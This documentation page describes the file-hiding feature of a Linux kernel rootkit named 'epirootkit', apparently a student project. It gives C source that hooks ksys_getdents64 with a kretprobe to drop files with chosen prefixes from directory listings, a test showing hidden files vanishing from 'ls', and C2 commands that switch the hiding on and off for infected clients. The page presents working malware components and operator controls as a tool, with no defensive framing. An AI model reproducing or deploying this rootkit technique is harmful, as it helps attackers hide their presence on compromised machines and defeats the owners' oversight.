On this page

File Hiding

Hide files and directories from directory listings using syscall interception

Implementation

  static const char * const hide_prefixes[] = { 
    "epirootkit",
    "jules_est_bo_", 
};

file_hiding_state.getdents_probe = (struct kretprobe) {
    .kp.symbol_name = "ksys_getdents64",
    .handler = getdents64_ret_handler,
    .entry_handler = getdents64_entry_handler,
    .data_size = sizeof(struct getdents_context),
    .maxactive = 20
};

Hooks ksys_getdents64 syscall and filters directory entries matching hidden prefixes.

Testing

  # Create test files
touch /tmp/epirootkit_test.txt /tmp/normal_file.txt

# Without file hiding
ls /tmp/
# Output: epirootkit_test.txt  normal_file.txt

# With file hiding enabled
ls /tmp/
# Output: normal_file.txt

Control

WebUI

Toggle via Configuration Panel

C2 Commands

  enable-file-hiding Client-1    # Enable hiding
disable-file-hiding Client-1   # Disable hiding
status Client-1                # Check state

Files remain accessible by full path - only directory listings are filtered.

Edit this page

Module Hiding

Hide the rootkit module from …

Persistence

Automatic rootkit loading …

File Hiding

Implementation link

Testing link

Control link

WebUI link

C2 Commands link

Implementation

Testing

Control

WebUI

C2 Commands